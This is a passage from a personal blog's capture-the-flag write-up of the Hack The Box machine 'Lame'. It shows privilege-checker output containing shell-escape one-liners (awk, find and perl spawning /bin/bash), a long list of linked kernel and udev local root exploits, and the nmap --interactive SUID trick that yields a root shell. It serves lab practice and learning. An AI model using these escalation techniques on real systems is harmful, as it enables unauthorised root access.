    awk-->	awk 'BEGIN {system("/bin/bash")}'
    find-->	find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    perl-->	perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8572 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c
    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || https://www.exploit-db.com/exploits/15023 || Language=c
    - < 2.6.29 exit_notify() Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8369 || Language=c
    - 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation || https://www.exploit-db.com/exploits/9844 || Language=python
    - < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit || https://www.exploit-db.com/exploits/14814 || Language=c
    - 2.x sock_sendpage() Local Root Exploit 2 || https://www.exploit-db.com/exploits/9436 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/25307 || Language=c
    - 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || https://www.exploit-db.com/exploits/9479 || Language=c
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8572 || Language=c
    - 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit || https://www.exploit-db.com/exploits/5092 || Language=c
    - Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit || https://www.exploit-db.com/exploits/9083 || Language=c
    - 2.4/2.6 sock_sendpage() Local Root Exploit [2] || https://www.exploit-db.com/exploits/9598 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || https://www.exploit-db.com/exploits/25450 || Language=c
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || https://www.exploit-db.com/exploits/15944 || Language=c
    - Linux RDS Protocol Local Privilege Escalation || https://www.exploit-db.com/exploits/15285 || Language=c
    - 2.6.x ptrace_attach Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8673 || Language=c
    - 2.x sock_sendpage() Local Ring0 Root Exploit || https://www.exploit-db.com/exploits/9435 || Language=c
    - Test Kernel Local Root Exploit 0day || https://www.exploit-db.com/exploits/9191 || Language=c
    - 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || https://www.exploit-db.com/exploits/926 || Language=c
    - CAP_SYS_ADMIN to root Exploit || https://www.exploit-db.com/exploits/15916 || Language=c
    - 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || https://www.exploit-db.com/exploits/9545 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c
    - < 2.6.36.2 Econet Privilege Escalation Exploit || https://www.exploit-db.com/exploits/17787 || Language=c
    - Sendpage Local Privilege Escalation || https://www.exploit-db.com/exploits/19933 || Language=ruby
    - < 2.6.37-rc2 ACPI custom_method Privilege Escalation || https://www.exploit-db.com/exploits/15774 || Language=c
    - 'pipe.c' Local Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/10018 || Language=sh
    - 2.4/2.6 sock_sendpage() Local Root Exploit [3] || https://www.exploit-db.com/exploits/9641 || Language=c
    - <= 2.6.37 Local Privilege Escalation || https://www.exploit-db.com/exploits/15704 || Language=c
    - 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/895 || Language=c
Finished
=================================================================================================
daemon@lame:/tmp/PrivescTools$ 

Given that the box appears to be based on Metasploitable there’s lots in there. One possible vector is the classic SUID attack on nmap.

Older versions of nmap (2.02 to 5.21) have an –interactive options which allows you to issue shell commands using the “!” character: e.g. !ls. And if nmap has the suid bit set then it’s running as root even when run by a non-privileged user:

The sequence above shows: first check the version: yes it’s old enough. Then get into the interactive mode with the –interactive switch. Then, instead of issuing individual commands, let’s try spawning a shell with !sh and then testing it. https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ covers this with some other privesc tricks. This is an attack I’ve only ever read about as an example of the risk of SUID so nice to actually use it for once.

There are other privesc routes on here given it’s Metasploitable. The udev exploit is being flagged up by the privchecker app. I tried it and it worked fine but not sure it’s really worth detailing here.

Filed Under: CTF, Penetration Testing Tagged With: Boot-to-Root, CTF, Hack The Box, Penetration Testing

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

About Me

I’m currently a systems admin / consultant at a IT firm who looks after the computer systems of small businesses in the UK. IT security is only a part of that job. However I’ve always enjoyed breaking into, getting around, subverting and otherwise hacking things, systems and ideas. In tackling some low-level IT security tasks I reignited my interest in the field and this blog charts my progress in the world of Computer Security, legal Hacking, Penetration Testing, Infosec – whatever you want to call it. As a Windows guy I’m learning about Linux, shell-scripting, python and all the other skills needed in this field.

Tags

Apache Boot-to-Root CTF curl dib Dirbuster FreeBSD Hack The Box Linux mysql NFS Penetration Testing PHP RCE shell VulnHub Wordpress

Categories

© 2023 · NeilSec;